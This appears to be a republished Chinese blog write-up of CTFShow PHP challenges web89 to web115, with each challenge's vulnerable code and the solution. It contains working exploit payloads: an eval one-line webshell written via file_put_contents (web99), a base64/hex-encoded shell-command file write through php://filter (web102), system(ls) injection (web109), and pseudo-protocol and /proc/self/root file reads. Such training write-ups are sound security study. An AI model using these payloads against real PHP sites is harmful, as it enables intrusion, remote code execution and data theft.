CTFSHOW php 特性

这篇具有很好参考价值的文章主要介绍了CTFSHOW php 特性。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

目录

web89 数组绕过正则

PHP preg_match() 函数 | 菜鸟教程

 web90  ===的绕过

首先 我们输入一个 4476a 就可以绕过 第一个nonono

也可以使用浮点型

也可以使用进制

web91   了解正则

web92 == 绕过

进制

 浮点型

科学计数法

web93 过滤字母

浮点型

 进制

 web94 strpos(字符串,字符)

八进制

 浮点型

web95 /[a-z]|\./i  正则过滤

八进制

web96  路径读取、伪协议

 web97 数组绕过md5比较

 web98    三目运算符

web99  file_put_contents写入

 web100 优先级

 web101  反射API

 web102 PHP短开表达式 回调函数call_user_func

web103

 web104 shal弱比较的绕过

web105


web89 数组绕过正则


include("flag.php");
highlight_file(__FILE__);

if(isset($_GET['num'])){
    $num = $_GET['num'];
get num
    if(preg_match("/[0-9]/", $num)){
是数字 就输出 no
        die("no no no!");
    }
    if(intval($num)){
如果是存在整数 输出 flag
        echo $flag;
    }
}

这个使用数组就可以绕过正则

这里学一下

PHP preg_match() 函数 | 菜鸟教程

?num[0]=1

CTFSHOW php 特性,WEB,php

 web90  ===的绕过


include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==="4476"){
        die("no no no!");
    }
    if(intval($num,0)===4476){
        echo $flag;
    }else{
        echo intval($num,0);
    }
} 

首先 我们输入一个 4476a 就可以绕过 第一个nonono

<?php
$num='4476a';
echo intval($num,0);

?>

CTFSHOW php 特性,WEB,php

这样 就绕过了 第二个 ===

也可以使用浮点型

<?php
$num=4476.1;
echo intval($num,0);

?>

也可以使用进制

CTFSHOW php 特性,WEB,php

intval($num,0)

设置第二个参数为0  如果识别到 0x 那么就自动 转为 16进制取整

<?php
$num=0x117c;
echo intval($num,0);

?>

CTFSHOW php 特性,WEB,php

web91   了解正则

include('flag.php');
$a=$_GET['cmd'];
if(preg_match('/^php$/im', $a)){
    if(preg_match('/^php$/i', $a)){
        echo 'hacker';
    }
    else{
        echo $flag;
    }
}
else{
    echo 'nonononono';
} 

 第一个if

/^phpA$/  以php为开头的字符串 并且以php结尾的字符串 就是php

/im 多行匹配和匹配大小写

第二个 就是 取消了多行匹配的机制 并且让我们

意思就是单行无法匹配到php开头的字符串

这个时候可以使用url编码的换行符 %0a

?cmd=%0aphp

CTFSHOW php 特性,WEB,php

web92 == 绕过

CTFSHOW php 特性,WEB,php

用之前的方法也可以

进制

CTFSHOW php 特性,WEB,php

 浮点型

CTFSHOW php 特性,WEB,php

 但是我们不能使用 4476a来绕过== 因为他不管比较的双方的类型

只要值相同就相同

我们输入 4476a  他读取到4476  就会和 另一方进行比较

这样 就绕不过去

科学计数法

但是我们可以使用字母e 因为在 计算机中 e有科学计数法的用法

当我们输入 4476e1 == 就会直接识别为 4476e1

绕过第一个 ==

web93 过滤字母

include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==4476){
        die("no no no!");
    }
    if(preg_match("/[a-z]/i", $num)){
        die("no no no!");
    }
    if(intval($num,0)==4476){
        echo $flag;
    }else{
        echo intval($num,0);
    } 

能发现不能使用科学计数法了

浮点型

4476.1

CTFSHOW php 特性,WEB,php

 进制

我们使用八进制 因为八进制 只要识别到0开头就默认为八进制

CTFSHOW php 特性,WEB,php

 CTFSHOW php 特性,WEB,php

 web94 strpos(字符串,字符)

include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==="4476"){
        die("no no no!");
    }
    if(preg_match("/[a-z]/i", $num)){
匹配 所有字母 并且不区分大小写
        die("no no no!");
    }
    if(!strpos($num, "0")){
当 0 出现在开头 就报错
这里可能是想过滤 八进制
        die("no no no!");
    }
    if(intval($num,0)===4476){
        echo $flag;
    } 

题目想过滤八进制 但是 其实还是可以使用八进制

八进制

?num=  010574

前面添加一个空格即可

CTFSHOW php 特性,WEB,php

 浮点型

?num=4476.01

这题主要是注意函数

strpos(字符串,字符)  查找字符在字符串第一次出现的位置

所以这个函数就是找到0出现的位置 并且不能让0 在开头

但是我们可以空格绕过

web95 /[a-z]|\./i  正则过滤


include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==4476){
        die("no no no!");
    }
    if(preg_match("/[a-z]|\./i", $num)){
这里又重新过滤了 .  说明浮点型也不行了
        die("no no no!!");
    }
    if(!strpos($num, "0")){
        die("no no no!!!");
    }
    if(intval($num,0)===4476){
        echo $flag;
    }
}

那就只能使用

八进制

?num=  010574
?num=+010574

web96  路径读取、伪协议



highlight_file(__FILE__);

if(isset($_GET['u'])){
    if($_GET['u']=='flag.php'){
        die("no no no");
    }else{
        highlight_file($_GET['u']);
高亮 flag
这里可以判断 
    }


}

hightlight_file(高亮文件的绝对路径,返回值) 其中返回值可选

这里很明显要我们输入flag的路径

那我们测一下

./flag.php   ./表示在当前目录下
../html/flag.php      ../ 表示父级目录 然后访问html中的flag
php://filter/read/resource=flag.php 伪协议

CTFSHOW php 特性,WEB,php

 web97 数组绕过md5比较


include("flag.php");
highlight_file(__FILE__);
if (isset($_POST['a']) and isset($_POST['b'])) {
if ($_POST['a'] != $_POST['b'])
if (md5($_POST['a']) === md5($_POST['b']))
echo $flag;
else
print 'Wrong.';
}
?> 


通过数组可以绕过MD5的比较

CTFSHOW php 特性,WEB,php

 web98    三目运算符

https://www.cnblogs.com/echoDetected/p/13999517.html

https://www.cnblogs.com/NPFS/p/13798533.html

说是三目运算符

$_GET?$_GET=&$_POST:'flag'; 

如果get请求存在 那么就通过 post来覆盖掉get请求
这里意思 就是 如果$_GET为真 那么就执行$_GET=&$_POST  否则执行'flag'

$_GET['flag']=='flag'?$_GET=&$_COOKIE:'flag';
$_GET['flag']=='flag'?$_GET=&$_SERVER:'flag'; 

这两个就是 比对get 是否为 flag

如果get接受的参数值为 flag 那就设置&$_COOKIE和&$_SERVER为flag

highlight_file($_GET['HTTP_FLAG']=='flag'?$flag:__FILE__); 

如果get的参数为 http_flag 并且内容为 flag

那么就输出  http_flag的地址

所以这里我们 get的值不能为flag 不然就会设置get为空

然后我们设置post为 HTTP_FLAG=flag

CTFSHOW php 特性,WEB,php

CTFSHOW php 特性,WEB,php

web99  file_put_contents写入 in_array漏洞

highlight_file(__FILE__);
$allow = array();
设为数组
for ($i=36; $i < 0x36d; $i++) { 
    array_push($allow, rand(1,$i));
向尾部插入 rand(1,$i) 循环 54次
}
if(isset($_GET['n']) && in_array($_GET['n'], $allow)){
    file_put_contents($_GET['n'], $_POST['content']);
将post的content 写入 get的文件中
如果get不存在 那么就创建文件
}

?> 

这里发现可以写东西到服务器中

那我们就想到一句话木马

这里主要是 in_array 存在漏洞

如果 in_array 的第三个参数不设置为 true 就不会比较类型
我们输入 1.php  他会自动识别和 allow一样的类型

为 1 

这里我们看看

get: ?n=1.php
post: content=<?php @eval($_POST['a']);?>

CTFSHOW php 特性,WEB,php

 web100 优先级

highlight_file(__FILE__);
include("ctfshow.php");
//flag in class ctfshow;
提示我们 在 ctfshow类中
$ctfshow = new ctfshow();
$v1=$_GET['v1'];
$v2=$_GET['v2'];
$v3=$_GET['v3'];
3个参数
$v0=is_numeric($v1) and is_numeric($v2) and is_numeric($v3);
第四个参数是 前三个相与

if($v0){
    if(!preg_match("/\;/", $v2)){
就是不能在v2中招到 分号;
        if(preg_match("/\;/", $v3)){
要在 v3中找到  分号;
            eval("$v2('ctfshow')$v3");
执行 v2 ('ctfshow')v3
这里 就发现v2 是命令 v3多半就分号 ;
        }
    }
    
}

第一个if判断

<?php
$v1=1;
数字
$v2="sb";
字符串
$v3=";";
字符
$v0=is_numeric($v1) and is_numeric($v2) and is_numeric($v3); 
echo $v0;
?>

CTFSHOW php 特性,WEB,php
 

这里的原理是 = 大于 and 和 or

这样 v0=1 and 0 and 0 还是1

 这样就绕过了第一个if

我们知道了 两个的类型

v2 命令

v3分号

这样我们就看看

如何输出

var_dump() 可以用于识别类型 并且输出 表达式的类型和值

PHP var_dump() 函数 | 菜鸟教程

我们让v2=var_dump($ctfshow)

v3=;

这样就构造了

var_dump($ctfshow)('ctfshow');

CTFSHOW php 特性,WEB,php

 CTFSHOW php 特性,WEB,php

 成功返回值了

我们继续尝试

?v1=1&v2=var_dump($ctfshow)&v3=;

CTFSHOW php 特性,WEB,php

 还有一个方式

就是

通过注释来绕过

CTFSHOW php 特性,WEB,php

 CTFSHOW php 特性,WEB,php

payload1: ?v1=1&v2=var_dump($ctfshow)&v3=;
payload2: ?v1=1&v2=var_dump($ctfshow)/*&v3=*/;

CTFSHOW php 特性,WEB,php

 web101  反射API

这个 是关于面向对象

存在一个 反射api

ReflectionClass 用于输出 类的详细信息

创建方式为 new ReflectionClass

可以使用echo ReflectionClass("ClassName" ) 输出类的信息

这里就可以使用这个来

?v1=1&v2=echo new ReflectionClass&v3=;

CTFSHOW php 特性,WEB,php

最后需要爆破最后一位

最后一位是 6

 web102 PHP短开表达式 回调函数call_user_func



highlight_file(__FILE__);
$v1 = $_POST['v1'];
$v2 = $_GET['v2'];
$v3 = $_GET['v3'];
$v4 = is_numeric($v2) and is_numeric($v3);
if($v4){
    $s = substr($v2,2);
从v2 的第二位开始读取
    $str = call_user_func($v1,$s);
然后使用回调函数
这里 $s会作为参数 被 $v1调用
这就是另一个调用函数的方式罢了
    echo $str;
    file_put_contents($v3,$str);
写入v3中
}
else{
    die('hacker');
}

这里我们首先要用v2来绕过 第一个if

这里介绍两个函数

bin2hex
和
hex2bin

这两个是 字符串 和 十六进制字符串 互相变换的函数

CTFSHOW php 特性,WEB,php

 我们思考 第一个if 需要是数字 然后绕过

那我们是不是可以生成一个 十六进制字符串 然后绕过

这里的读取命令是特殊构造的 需要绕过is_numeric()

可以通过科学计数法绕过

这里提及PHP短开表达式

<?=`cat *`;




<?=(表达式)?>
相当于
<?php echo (表达式);?>

然后我们通过伪协议 通过解密base64写入文件

以为这个特殊构造的命令是 要先base64加密 然后通过 bin2hex 转换字符串

就可以形成特殊的 科学计数法形式

CTFSHOW php 特性,WEB,php

 CTFSHOW php 特性,WEB,php

 这里最后的= 可以删除 不删除就无法绕过

50 44 38 39 59 47 4e 68 64 43 41 71 59 44 73

然后可以开始写入

payload

get :   v2=005044383959474e6864434171594473&v3=php://filter/write=convert.base64-decode/resource=34.php
       

post:   v1=hex2bin

CTFSHOW php 特性,WEB,php

 这样就绕过了

web103

highlight_file(__FILE__);
$v1 = $_POST['v1'];
$v2 = $_GET['v2'];
$v3 = $_GET['v3'];
$v4 = is_numeric($v2) and is_numeric($v3);
if($v4){
    $s = substr($v2,2);
    $str = call_user_func($v1,$s);
    echo $str;
    if(!preg_match("/.*p.*h.*p.*/i",$str)){
        file_put_contents($v3,$str);
    }
    else{
        die('Sorry');
    }
}
else{
    die('hacker');
}

加了个过滤条件

但是还是可以通过 102的方式直接做

CTFSHOW php 特性,WEB,php

 web104 shal弱比较的绕过

highlight_file(__FILE__);
include("flag.php");

if(isset($_POST['v1']) && isset($_GET['v2'])){
    $v1 = $_POST['v1'];
    $v2 = $_GET['v2'];
    if(sha1($v1)==sha1($v2)){
        echo $flag;
    }
} 

这里主要是 shal 的比较

其实shal和MD5一样 可以通过数组绕过

CTFSHOW php 特性,WEB,php

web105  变量覆盖

 <?php

/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-28 22:34:07

*/

highlight_file(__FILE__);
include('flag.php');
error_reporting(0);
$error='你还想要flag嘛?';
$suces='既然你想要那给你吧!';
foreach($_GET as $key => $value){
    if($key==='error'){
        die("what are you doing?!");
    }
    $$key=$$value;
}foreach($_POST as $key => $value){
    if($value==='flag'){
        die("what are you doing?!");
    }
    $$key=$$value;
}
if(!($_POST['flag']==$flag)){
    die($error);
}
echo "your are good".$flag."\n";
die($suces);

?>
你还想要flag嘛?

首先来分析一下

GET
if($key==='error')

POST
if($value==='flag')

如果get的内容为 error 那么报错
如果post内容为flag 那么就报错


否则就将key内容设置为value的值

if(!($_POST['flag']==$flag)){
    die($error);
}
echo "your are good".$flag."\n";
die($suces);


这一段代码就是我们得到flag的方式

1.如果 error将变量flag输出

只需要将flag的值覆盖到error上即可

GET

x=flag

POST

error=x

CTFSHOW php 特性,WEB,php

2.通过suces输出flag


GET
?suces=flag&flag=

这里首先将suces的值设置为 flag

然后又将 flag设置为空

这样就绕过了

if(!($_POST['flag']==$flag)){
    die($error);
} 

 CTFSHOW php 特性,WEB,php

web106

<?php

/*
# -*- coding: utf-8 -*-
# @Author: atao
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-28 22:38:27

*/


highlight_file(__FILE__);
include("flag.php");

if(isset($_POST['v1']) && isset($_GET['v2'])){
    $v1 = $_POST['v1'];
    $v2 = $_GET['v2'];
    if(sha1($v1)==sha1($v2) && $v1!=$v2){
        echo $flag;
    }
}



?> 

shal可以通过数组绕过

?v2[]=1


v1[]=2

CTFSHOW php 特性,WEB,php

 web107  特殊的md ‘科学计数法’

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-28 23:24:14

*/


highlight_file(__FILE__);
error_reporting(0);
include("flag.php");

if(isset($_POST['v1'])){
    $v1 = $_POST['v1'];
    $v3 = $_GET['v3'];
       parse_str($v1,$v2);
       if($v2['flag']==md5($v3)){
           echo $flag;
       }

}



?> 

看看函数

parse_str()

<?php
parse_str("name=Bill&age=60");
echo $name."<br>";
echo $age;
?>

这里给出

parse_str(string,array)

所以 v1是string  v2是array 就是数组名

所以我们要让 v2里面的数组 存在 flag

并且他的值要和v3的md5一样

这里我们就直接payload

GET 

?v3=1


POST

v1=flag=c4ca4238a0b923820dcc509a6f75849b

这样 v2就存在 flag->c4ca4238a0b923820dcc509a6f75849b的数组

其中 c4ca4238a0b923820dcc509a6f75849b就是1 的md5值

这里还存在另一个做法

首先我们注意是弱比较

==

这里就存在另一个payload

?v3=240610708



v1=flag=0

原理 是 240610708 的md5是0e462097431906509019562988736854

这里就类科学计数法 这样 == 就会识别为0

那么 就得到flag

web108  ereg的00截断漏洞


highlight_file(__FILE__);
error_reporting(0);
include("flag.php");

if (ereg ("^[a-zA-Z]+$", $_GET['c'])===FALSE)  {
    die('error');

}
//只有36d的人才能看到flag
if(intval(strrev($_GET['c']))==0x36d){
    echo $flag;
}

?>
error

首先我们要先了解函数

第一个函数 ereg 

if (ereg ("^[a-zA-Z]+$", $_GET['c'])===FALSE)  {
    die('error');


首先匹配一个或多个由字母组成的字符串

ereg()函数:字符串对比解析,区分大小写

这里的意思就是 c  必须是字母的字符串

接下来是下一个strrev

这个是反装字符串 我们输入 d63x0 就会输出 0x36d

所以这道题需要我们并且还是需要通过intval来转换为整数

这里我们就需要绕过ereg 这样我们才可以输入数字

ereg存在00截断的漏洞

所以我们 通过 a%00 即可绕过

我们只需要通过 778 就可以让intval 识别为 0x36d

所以paylaod是

?c=a%00778

CTFSHOW php 特性,WEB,php

web109  _toString类 遇到echo new 内置类

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-29 22:02:34

*/


highlight_file(__FILE__);
error_reporting(0);
if(isset($_GET['v1']) && isset($_GET['v2'])){
    $v1 = $_GET['v1'];
    $v2 = $_GET['v2'];

    if(preg_match('/[a-zA-Z]+/', $v1) && preg_match('/[a-zA-Z]+/', $v2)){
            eval("echo new $v1($v2());");
    }

}

?> 

首先 echo new 执行新类 那么就说明 我们执行的类需要有 _toString的方法

就是能直接返回值

其次我们需要了解 php中存在嵌套的函数调用

$a='phpinfo';
那么
$a=phpinfo();

相当

那我们只需要通过 _toSring方法输出即可

找到符合条件的异常类Exception以及反射类ReflectionClass

所以我们使用随便取一个作为payload

?v1=ReflectionClass&v2=system(ls)


这里会变为 echo new ReflectionClass(system(ls)());

会先执行命令 然后报错 

CTFSHOW php 特性,WEB,php

?v1=ReflectionClass&v2=highlight_file("fl36dg.txt")

 CTFSHOW php 特性,WEB,php

 web110  内置类 FilesystemIterator 读取文件目录  getcwd函数

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-29 22:49:10

*/


highlight_file(__FILE__);
error_reporting(0);
if(isset($_GET['v1']) && isset($_GET['v2'])){
    $v1 = $_GET['v1'];
    $v2 = $_GET['v2'];

    if(preg_match('/\~|\`|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\_|\-|\+|\=|\{|\[|\;|\:|\"|\'|\,|\.|\?|\\\\|\/|[0-9]/', $v1)){
            die("error v1");
    }
    if(preg_match('/\~|\`|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\_|\-|\+|\=|\{|\[|\;|\:|\"|\'|\,|\.|\?|\\\\|\/|[0-9]/', $v2)){
            die("error v2");
    }

    eval("echo new $v1($v2());");

}

?> 

过滤了数字和符号

这里又要使用另一个内置类 迭代器FilesystemIterator

构造方法是目录

<?php
$iterator = new FilesystemIterator('.');  // 创建当前目录的迭代器
 
while ($iterator->valid()) { // 检测迭代器是否到底了
    echo $iterator->getFilename(), ':', $iterator->getCTime(), PHP_EOL;
    $iterator->next();  // 游标往后移动
}
?>

CTFSHOW php 特性,WEB,php

 那么我们如何获取当前目录 可以使用 getcwd函数

那么payload就出现了

?v1=FilesystemIterator&v2=getcwd

getcwd():获取当前文件目录
FilesystemIterator&遍历文件的类
DirctoryIntrerator 遍历目录的类

但是我们无法读取 直接访问文件即可

CTFSHOW php 特性,WEB,php

web111 超全局变量  $GOLBALS

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-30 02:41:40

*/

highlight_file(__FILE__);
error_reporting(0);
include("flag.php");

function getFlag(&$v1,&$v2){
    eval("$$v1 = &$$v2;");
    var_dump($$v1);
}


if(isset($_GET['v1']) && isset($_GET['v2'])){
    $v1 = $_GET['v1'];
    $v2 = $_GET['v2'];

    if(preg_match('/\~| |\`|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\_|\-|\+|\=|\{|\[|\;|\:|\"|\'|\,|\.|\?|\\\\|\/|[0-9]|\<|\>/', $v1)){
            die("error v1");
    }
    if(preg_match('/\~| |\`|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\_|\-|\+|\=|\{|\[|\;|\:|\"|\'|\,|\.|\?|\\\\|\/|[0-9]|\<|\>/', $v2)){
            die("error v2");
    }
    
    if(preg_match('/ctfshow/', $v1)){
            getFlag($v1,$v2);
    }
    

    


}

?> 

这题主要是

function getFlag(&$v1,&$v2){
    eval("$$v1 = &$$v2;");
    var_dump($$v1);
} 


看样子是输出 v1 其实是输出v2

    
    if(preg_match('/ctfshow/', $v1)){
            getFlag($v1,$v2);
    }
    

v1中需要有 ctfshow 的字符串


那么我们就存入ctfshow

这里我们可以使用 GLOBALS 来通过 var_dump输出全局变量

CTFSHOW php 特性,WEB,php

 所以payload就出现了

?v1=ctfshow&v2=GLOBALS

CTFSHOW php 特性,WEB,php

 web112 is_file 和highlight_file对于伪协议的判断

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-30 23:47:49

*/

highlight_file(__FILE__);
error_reporting(0);
function filter($file){
    if(preg_match('/\.\.\/|http|https|data|input|rot13|base64|string/i',$file)){
        die("hacker!");
    }else{
        return $file;
    }
}
$file=$_GET['file'];
if(! is_file($file)){
    highlight_file(filter($file));
}else{
    echo "hacker!";
} 

is_file认为伪协议不是文件,highlight_file认为伪协议是文件

这题目需要我们传入的东西不是文件 但是需要通过 highlight_file来输出

那么很显然就使用伪协议来读取一下

所以我们直接通过伪协议查看

payload

php://filter/convert.quoted-printable-encode/resource=flag.php

web113 过滤了 filter 使用

 <?php

/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-30 23:47:52

*/

highlight_file(__FILE__);
error_reporting(0);
function filter($file){
    if(preg_match('/filter|\.\.\/|http|https|data|data|rot13|base64|string/i',$file)){
        die('hacker!');
    }else{
        return $file;
    }
}
$file=$_GET['file'];
if(! is_file($file)){
    highlight_file(filter($file));
}else{
    echo "hacker!";
} 

过滤了 filter过滤器

使用其他的伪协议

compress.zlib://flag.php

目录溢出

预期是目录溢出

首先了解linux下的目录

/proc/self/root

 是指向 linux文件的根目录

CTFSHOW php 特性,WEB,php

 并且 is_file 对文件名的判断存在长度限制 并且需要传入的是绝对路径

那么我们可以构造一个一直访问根目录 来绕过绝对路径

/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root

这个时候 会无法访问到文件 而一直访问文件夹

当达到预定长度后 就会实现目录溢出

/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/var/www/html/flag.php

 CTFSHOW php 特性,WEB,php

 

web114

 <?php

/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-10-01 15:02:53

*/

error_reporting(0);
highlight_file(__FILE__);
function filter($file){
    if(preg_match('/compress|root|zip|convert|\.\.\/|http|https|data|data|rot13|base64|string/i',$file)){
        die('hacker!');
    }else{
        return $file;
    }
}
$file=$_GET['file'];
echo "师傅们居然tql都是非预期 哼!";
if(! is_file($file)){
    highlight_file(filter($file));
}else{
    echo "hacker!";
} 师傅们居然tql都是非预期 哼! <?php 

把filter放出来了 直接通过 filter读取即可

web115  is_numeric和trim双检测

 <?php

/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-10-01 15:08:19

*/

include('flag.php');
highlight_file(__FILE__);
error_reporting(0);
function filter($num){
    $num=str_replace("0x","1",$num);
    $num=str_replace("0","1",$num);
    $num=str_replace(".","1",$num);
    $num=str_replace("e","1",$num);
    $num=str_replace("+","1",$num);
    return $num;
}
$num=$_GET['num'];
if(is_numeric($num) and $num!=='36' and trim($num)!=='36' and filter($num)=='36'){
    if($num=='36'){
        echo $flag;
    }else{
        echo "hacker!!";
    }
}else{
    echo "hacker!!!";
} hacker!!!
function filter($num){
    $num=str_replace("0x","1",$num);
    $num=str_replace("0","1",$num);
    $num=str_replace(".","1",$num);
    $num=str_replace("e","1",$num);
    $num=str_replace("+","1",$num);
    return $num;
} 

十六进制 八进制 浮点数 科学计数法 开头绕过

全被ban了


if(is_numeric($num) and $num!=='36' and trim($num)!=='36' and filter($num)=='36')


首先需要整数   不能为36  开头删除空白后 不能等于36 并且ban了上面的

这里主要是通过师傅的测试来学习更深入学习 php

首先我们这里了解到 主要就是 is_numeric和trim两个函数

那我们做个测试看看

<?php
for($i=0;$i<128;$i++){
$x=chr($i).'1';
if(is_numeric($x)==true){
echo urlencode(chr($i))."\n";
}
}
?>

这里主要是输出 循环ascii后 在1前面加上字符后 是否能够识别为数字 如果可以输出字符

%09 %0A %0B %0C %0D + %2B - . 0 1 2 3 4 5 6 7 8 9 

发现这些字符可以绕过 is_numeric函数

那么我们再加上条件 trim()

<?php
for($i=0;$i<128;$i++){
$x=chr($i).'1';
if(is_numeric($x)==true and trim($x)!=="1"){
echo urlencode(chr($i))."\n";
}
}
?>
%0C %2B - . 0 1 2 3 4 5 6 7 8 9 


%2b是 +

对比一下 filter 发现只有 %0c可以绕过

所以payload就出现了

?num=%0C36

CTFSHOW php 特性,WEB,php文章来源地址https://www.toymoban.com/news/detail-623213.html

到了这里,关于CTFSHOW php 特性的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • CTFSHOW php 特性

    目录 web89 数组绕过正则 PHP preg_match() 函数 | 菜鸟教程  web90  ===的绕过 首先 我们输入一个 4476a 就可以绕过 第一个nonono 也可以使用浮点型 也可以使用进制 web91   了解正则 web92 == 绕过 进制  浮点型 科学计数法 web93 过滤字母 浮点型  进制  web94 strpos(字符串,字符) 八进制

    2024年02月14日
    浏览(39)
  • 云曦暑期学习第三周——ctfshow--php特性(89-104)

    目录 web89  preg_match函数 、数组 web90  intval()函数、强比较 web91  正则修饰符 web92  intval()函数、弱比较 web93  八进制、小数点 web94  strpos() 函数、小数点 web95  小数点 web96   highlight_file() 下的目录路径 web97  数组 web98  三目运算符 web99   in_array函数 web100   优先级 web101 反射

    2024年02月14日
    浏览(42)
  • Ctfshow web入门 sqli-labs特性篇 web517-web568 详细题解 全

    这里插一句。 limit 100,1 是从第100条数据开始,读取1条数据。 limit 6 是读取前6条数据。 报错注入 绕过字符串返回长度限制。 盲注 布尔和时间都可以的。 闭合换成了 \\\" 。其他和上题一样。 ctfshow–flagpa–flag3a3– 测一下回显位 布尔盲注还是能用。不过这次我们换个方法。 它

    2024年02月15日
    浏览(46)
  • 【Web】CTFSHOW PHP命令执行刷题记录(全)

    目录 web29 web30 web31 web32 web33 web34 web35 web36 web37-39 web40 web41 (y4✌脚本) web42 -44 web45 web46 -49 web50 web51 web52 web53 web54 web55-56 web57 web58 web59 web60 web61 web62 web63-65 web66-67 web68-70 web71 web72 web73-74 web75-76 web77 期末复习不了一点,不如做点旧题醒一醒手感。每一题都尽量用不同payload,如果

    2024年01月23日
    浏览(41)
  • 【Web】CTFSHOW PHP文件包含刷题记录(全)

    温故知新。 目录 web78 web79 web80 web81 web82 web83 web84 web85 web86 web87 web88 伪协议base64编码直接读出文件内容就行 一眼data伪协议包含php脚本 data也被禁了,日志包含即可 多禁了一个\\\":\\\",还是可以日志包含 连\\\".\\\"都被禁用了,/tmp/sess_xxx是不带点的,尝试多线程条件竞争包含临时目录下

    2024年02月02日
    浏览(43)
  • 小迪安全20WEB 攻防-PHP 特性&缺陷对比函数&CTF 考点&CMS 审计实例

    #研究对象 PHP代码漏洞(代码问题) # 知识点: 1 、过滤函数缺陷绕过 2 、 CTF 考点与代码审计 一、原理-缺陷函数-使用讲解-本地 内置函数: 大部分是比较函数(过滤时使用的函数) (1)、== 与 === : 参考: PHP 浅谈 == 和=== 中,数字和字符串比较的问题。_php 数字==字符串

    2024年01月19日
    浏览(53)
  • CTFSHOW php命令执行

    目录 web29  过滤flag web30   过滤system php web31 过滤    cat|sort|shell|. 这里有一个新姿势 可以学习一下 web32 过滤 ;`` \\\'\\\' . web33 web34 web35 web36 web37 data伪协议 web38 短开表达式 web39 web40   __FILE__命令的扩展 web41 web42 重定向 web43 web44 web45 web46 web47 web48 web49 web50 web51  web52 web53 web54 

    2024年02月13日
    浏览(38)
  • ctfshow 第三届愚人杯 easy_php

    这题学的了一些小tips,这里讲解一下。 这里详细讲解一下使用c绕过wakup。 O标识符代表对象类型,而C标识符代表类名类型。如果将O替换为C,则在反序列化时会将其解释为一个新的类名字符串,从而创建一个新的类而不是对象。因为这个新的类没有被序列化过,所以它没有任

    2023年04月26日
    浏览(63)
  • CTFshow web入门---web56

    题目: 题目分析: 查看本题,发现本题为命令执行类题目,但是有一个很致命的点,那么就是他过滤了所有的字母和数字,以及一系列的符号。因此本题最值得推敲的点就是如何实现 无字母数字的命令执行 通过拜读P神的一篇文章,其中《无字母数字webshell之提高篇》讲到了

    2023年04月22日
    浏览(38)
  • ctfshow web入门 web141-145

    1.web141 ^w+$表示在开头和末尾匹配字母数字_,传入的v3值不能有字母数字_,即无字母的命令执行 php中1-phpinfo()是可以执行的,加减乘除都可以实现 这里或,异或,取反等运算都可以 这里采用羽师傅的异或脚本生成payload payload: 2.web142 payload: 3.web143 过滤了取反,+,-等符号,还可

    2024年02月22日
    浏览(66)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包